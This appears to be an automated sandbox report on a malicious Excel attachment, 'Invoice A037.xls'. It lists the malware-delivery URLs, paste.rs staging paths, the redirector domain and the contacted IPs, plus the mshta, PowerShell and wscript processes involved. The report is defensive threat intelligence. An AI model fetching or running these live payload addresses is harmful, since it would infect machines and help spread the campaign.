http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Q	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4K	0%	Avira URL Cloud	safe
https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-1006	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.23	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki	0%	Virustotal		Browse
http://go.6	0%	Avira URL Cloud	safe
https://paste.rs/ACRWCy	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFp	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFl	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4K	0%	Avira URL Cloud	safe
https://short.ruksk.com/	100%	Avira URL Cloud	malware
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta2	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynice	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htat	0%	Avira URL Cloud	safe
https://paste.rs/ACRWC	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:	0%	Avira URL Cloud	safe
http://23.95.235.29/	0%	Avira URL Cloud	safe
https://paste.rs/	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asa	0%	Avira URL Cloud	safe
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasa	0%	Avira URL Cloud	safe
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF	0%	Avira URL Cloud	safe
https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.rs	45.63.94.214	true	true	1%, Virustotal, Browse	unknown
paste.ee	188.114.97.6	true	false		high
cloudinary.map.fastly.net	151.101.1.137	true	false		high
short.ruksk.com	54.150.207.131	true	false		high
res.cloudinary.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa	false	Avira URL Cloud: malware	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	true	Avira URL Cloud: safe	unknown
https://paste.rs/ACRWC	true	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF	true	Avira URL Cloud: safe	unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki	mshta.exe, 00000004.00000003.436007400.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.000000000046E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434003137.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000034E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX	powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Q	mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4K	mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-1006	wscript.exe, 0000001A.00000002.509713850.00000000046B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.23	mshta.exe, 00000004.00000003.436100458.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.490780364.0000000003115000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485500603.0000000003115000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.6	powershell.exe, 0000000F.00000002.520578292.0000000000426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:	mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFp	powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/	powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFl	powershell.exe, 00000008.00000002.457451586.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C32C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.rs/ACRWCy	wscript.exe, 0000001A.00000003.509150838.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509409048.00000000003D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://short.ruksk.com/	mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438873247.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439302235.0000000003C2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4K	mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta2	mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynice	powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htat	mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:	powershell.exe, 00000008.00000002.461003227.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.504255540.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/	mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.rs/	wscript.exe, 0000000E.00000002.469658400.00000000041DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.00000000046D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:	mshta.exe, 00000012.00000003.491244632.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/	mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asa	mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasa	mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.457674292.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.521154149.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002276000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k	mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.95.235.29	unknown	United States	36352	AS-COLOCROSSINGUS	true
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
45.63.94.214	paste.rs	United States	20473	AS-CHOOPAUS	true
54.150.207.131	short.ruksk.com	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.255

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572970
Start date and time:	2024-12-11 10:52:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Sample name:	Invoice A037.xls
Detection:	MAL
Classification:	mal100.spre.phis.troj.expl.evad.winXLS@38/53@27/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target mshta.exe, PID 2556 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3516 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:53:54	API Interceptor	131x Sleep call for process: mshta.exe modified
04:53:59	API Interceptor	191x Sleep call for process: powershell.exe modified
04:54:00	API Interceptor	190x Sleep call for process: AcroRd32.exe modified
04:54:09	API Interceptor	188x Sleep call for process: wscript.exe modified
04:54:16	API Interceptor	4x Sleep call for process: RdrCEF.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

